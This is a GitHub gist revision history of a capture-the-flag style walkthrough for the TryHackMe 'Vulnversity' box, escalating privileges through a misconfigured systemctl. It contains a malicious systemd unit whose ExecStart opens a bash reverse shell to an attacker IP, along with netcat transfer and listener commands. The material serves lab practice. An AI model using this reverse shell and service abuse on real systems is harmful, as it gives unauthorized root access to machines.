-
-
Save antonga23/10eb500dbb5da9b7985755eedcacdf14 to your computer and use it in GitHub Desktop.
Revisions
-
Alvin Smith revised this gist
Feb 2, 2021 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,5 @@ # For better reading experience https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation ### 0. Prepare your payload `root.service` ``` -
Feb 2, 2021 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -46,6 +46,7 @@ Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service ### 5. The listening 9999 would give you the root Expand Knowlege https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/ -
Feb 2, 2021 . 1 changed file with 4 additions and 4 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -21,7 +21,7 @@ or ``` find -type d -maxdepth 2 -writable ``` ### 2. Transfter the payload(There might be other ways) ###### Init the target listening the port ``` nc -vl 44444 > root.service @@ -30,11 +30,11 @@ nc -vl 44444 > root.service ``` nc -n TargetIP 44444 < root.service ``` ### 3. Start listening on the 9999 ``` nc -lvnp 9999 ``` ### 4. Execute the payload(assume the file is under /var/tmp) ``` /bin/systemctl enable /var/tmp/root.service Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service @@ -43,7 +43,7 @@ Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service ``` /bin/systemctl start root ``` ### 5. The listening 9999 would give you the root Expand Knowlege https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory -
Feb 2, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -13,7 +13,7 @@ ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1' [Install] WantedBy=multi-user.target ``` ### 1. Find a files/directories that writable ``` find -type f -maxdepth 2 -writable ``` -
Feb 2, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ Practice box https://tryhackme.com/room/vulnversity ### 0. Prepare your payload `root.service` ``` [Unit] Description=roooooooooot -
Feb 2, 2021 . 1 changed file with 15 additions and 10 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,10 +1,4 @@ Practice box https://tryhackme.com/room/vulnversity 0. Prepare your payload `root.service` ``` @@ -19,11 +13,15 @@ ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1' [Install] WantedBy=multi-user.target ``` 1. Find a files/directories that writable ``` find -type f -maxdepth 2 -writable ``` or ``` find -type d -maxdepth 2 -writable ``` 2. Transfter the payload(There might be other ways) ###### Init the target listening the port ``` nc -vl 44444 > root.service @@ -45,4 +43,11 @@ Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service ``` /bin/systemctl start root ``` 5. The listening 9999 would give you the root Expand Knowlege https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/ https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49 -
Jan 12, 2021 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -4,6 +4,8 @@ https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/ https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49 practice box https://tryhackme.com/room/vulnversity 0. Prepare your payload `root.service` ``` [Unit] -
Jun 1, 2020 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Jun 1, 2020 . 1 changed file with 4 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,7 @@ https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/ https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49 0. Prepare your payload `root.service` @@ -20,11 +22,11 @@ WantedBy=multi-user.target find -type f -maxdepth 2 -writable ``` 2. Transfter the payload ###### Init the target listening the port ``` nc -vl 44444 > root.service ``` ###### Send file to traget ``` nc -n TargetIP 44444 < root.service ``` -
Jun 1, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,44 @@ https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/ https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49 0. Prepare your payload `root.service` ``` [Unit] Description=roooooooooot [Service] Type=simple User=root ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1' [Install] WantedBy=multi-user.target ``` 1. Find a directory that could write files ``` find -type f -maxdepth 2 -writable ``` 2. Transfter the payload #### Init the target listening the port ``` nc -vl 44444 > root.service ``` #### Send file to traget ``` nc -n TargetIP 44444 < root.service ``` 3. Start listening on the 9999 ``` nc -lvnp 9999 ``` 4. Execute the payload(assume the file is under /var/tmp) ``` /bin/systemctl enable /var/tmp/root.service Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service ``` ``` /bin/systemctl start root ``` 5. listening on [any] 9999... now you get the root
Alvin Smith
revised
this gist